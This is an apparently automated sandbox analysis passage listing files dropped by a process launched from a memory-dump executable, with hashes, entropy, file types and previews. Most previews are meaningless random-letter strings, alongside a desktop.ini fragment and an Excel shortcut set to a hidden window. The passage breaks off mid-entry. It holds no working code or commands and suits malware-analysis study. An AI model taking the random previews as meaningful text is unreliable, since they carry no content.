                                                                                                  Malicious:false
                                                                                                  Preview:BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC
                                                                                                  Process:C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):282
                                                                                                  Entropy (8bit):3.514693737970008
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlWygDAlLwkAl2FlRaQmZWGokJISlfY:QZsiL5wmHOlDmo0qmWvclLwr2FlDmo0I
                                                                                                  MD5:9E36CC3537EE9EE1E3B10FA4E761045B
                                                                                                  SHA1:7726F55012E1E26CC762C9982E7C6C54CA7BB303
                                                                                                  SHA-256:4B9D687AC625690FD026ED4B236DAD1CAC90EF69E7AD256CC42766A065B50026
                                                                                                  SHA-512:5F92493C533D3ADD10B4CE2A364624817EBD10E32DAA45EE16593E913073602DB5E339430A3F7D2C44ABF250E96CA4E679F1F09F8CA807D58A47CF3D5C9C3790
                                                                                                  Malicious:false
                                                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.3.....
                                                                                                  Process:C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.705615236042988
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                                                                                                  MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                                  SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                                  SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                                  SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                                  Malicious:false
                                                                                                  Preview:DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP
                                                                                                  Process:C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.694985340190863
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                                                  MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                                                  SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                                                  SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                                                  SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                                                  Malicious:false
                                                                                                  Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS
                                                                                                  Process:C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Wed Oct 4 09:54:07 2023, mtime=Wed Oct 4 09:54:34 2023, atime=Wed Oct 4 09:54:07 2023, length=53161064, window=hide
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2455
                                                                                                  Entropy (8bit):3.9865088809355265
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:8ojpcRdOs+k/TdfizNuKfdCZxCdCMOXudSdMh0+jW7AjjvA:8I+uNuG4uPh0+jp
                                                                                                  MD5:D62380E4F2DE5CAAFABDF8B1676527C8
                                                                                                  SHA1:EF9C2AB4A68EBF6AC9972ADBEC150382A43BF33E
                                                                                                  SHA-256:9B0EA6FEFC049C062D3E4853F108A5CA51417EF8A02BBBD7FC267DE8E183198A
                                                                                                  SHA-512:4225DB6E812FD7DE36A399FB36FB85FFD23E520D0CA9B79755E65DC90C68454A7C6316017AAAFDA9F0794F3236FD9E112F538B81BD1D9359043FFFD7411EA79B
                                                                                                  Malicious:false
                                                                                                  Preview:L..................F.@.. ............k.)......N.....h,+.....................5....P.O. .:i.....+00.../C:\.....................1.....DW.V..PROGRA~2.........O.IDW.V....................V.....^H..P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....j.1.....DW.V..MICROS~2..R......DW.VDW.V....{........................M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....N.1.....DW.V..root..:......DW.VDW.V....c.......................V.r.o.o.t.....Z.1.....DW.V..Office16..B......DW.VDW.V.....?....................##..O.f.f.i.c.e.1.6.....\.2.h,+.DW.V .EXCEL.EXE.D......DW.VDW.V....c&........................E.X.C.E.L...E.X.E.......n...............-.......m............F.......C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE..>.E.a.s.i.l.y. .d.i.s.c.o.v.e.r.,. .v.i.s.u.a.l.i.z.e.,. .a.n.d. .s.h.a.r.e. .i.n.s.i.g.h.t.s. .f.r.o.m. .y.o.u.r. .d.a.t.a...K.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.r.o.o.t.\.O.f.f
                                                                                                  Process:C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.695860210921229
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:TFQT9Q9JyaMK5Tkl4rqfRs73U2PVD3BWUS:mT9iSRiqfRsxPGt
                                                                                                  MD5:71B2CE35DD64EA4E8D5C67BD6BFF698E
                                                                                                  SHA1:48D65EB151E97D1D41267A43B4DC1801C4F89255
                                                                                                  SHA-256:A6DBE7820A7D3FD17EB24EE41CCE56C9647B150E1A1392F58ABD947EE1829FC7
                                                                                                  SHA-512:73128DA16516B0E5D04EB6D859A8FDC4663B47F74A7AAC99263582746BC414BAB05FB4DFF40F5E0EF838682D63671FE11DD6C5891D059D51FFB872E1FD9B60BA
                                                                                                  Malicious:false
                                                                                                  Preview:FENIVHOIKNBCYIYDETVMHAXXCUSKVBIKIZDOEBTCBYNFPROLSQLGSXMEBIFYTUGWARWVYMTQJJQHOGKAFRWEYLIITISQGUPNXIDRSAYRHVYBLCBPWDGDGMRFUPDGTHSUZALGWUNUNBPRSUWLDEERQZPJULFBMZZHTJYWKVZQVLEDDNLGBWDACOPLRJZKBPCUZDJREYTIGQRDICOOOTVHDKQUIYHXBSIPRQMYKFMFQBOFQNAEVGNCFJMUUNPEAZHDDUMGETMIDSYNOIDGLIWBLWJMUJDZSXZDTSQDRTDTAVJOIMKOGLNUSQUAAVWIKDQYSLHFCCBWRVFCOFFOFLNYESKIXGLREFBUHJNLTUZWTINZBYSZGLBVOBBMXEMHDAPUEBYUOSIBCQKNMEMTLMDFOFSCTXSWXGSMZYXOITZUXDRNGKAWBECBBUVWDKNSCDDEQNOOYGYYOAXMJOTRVNPFWPCZVSEJKHIGKFUWNCSZBXBGNPXFFHNXKDQDNFIONUVXOCROEEFIGZFWGAHIHFQJGZYTVKVZDPYDSXSERFLDJPCVGKHMQFOTHPVOKTYLWAPGHXOGTKAUNDASAZUZHWRURHYWEQLZGBTJRWZBMRYRMEKQZWHBZYXZEMYOBLGWOOWHYBSYOACREZYWYZKZDZWKRVNMAIUFSJMRFNLCHGSJRDBFEVZHVONCJAKDIVXPNZSDFWRJZBNYCVNHSEHCTSXOCQTOLQXZKOFIQXWXQZEAWRCJWAJSYKYOZORHAIEUYWKKUMHQYPYIOSCFFODFUWOINUDONNHLPCLQAFMHQEHKVMPTJGZMRGJZGKKWXKQOCGHCKXSSHZWEGSFCSZBPAQPMKBQLDGHBWUHQXSHUZQGJVNGEWRQKNQTDOVIMFGAUQLLNAVTSEJCTOSENTCVYPTJTCCNNBRJDHLKKWLYCZNBHTKJZYJQTOROFOXGEKHGJMAWOECWOBHFFIQIEISKZOCKOWMGRFEKTINHWHFFOTZPG
                                                                                                  Process:C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.692693183518806
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                  MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                  SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                  SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                  SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                  Malicious:false
                                                                                                  Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ
                                                                                                  Process:C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.699548026888946
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                  Malicious:false
                                                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                  Process:C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.699548026888946
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                  Malicious:false
                                                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                  Process:C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.694982189683734
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                  MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                  SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                  SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                  SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                  Malicious:false
                                                                                                  Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST
                                                                                                  Process:C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.694982189683734
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                  MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                  SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                  SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                  SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                  Malicious:false
                                                                                                  Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST
                                                                                                  Process:C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.687722658485212
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                  MD5:9A59DF7A478E34FB1DD60514E5C85366
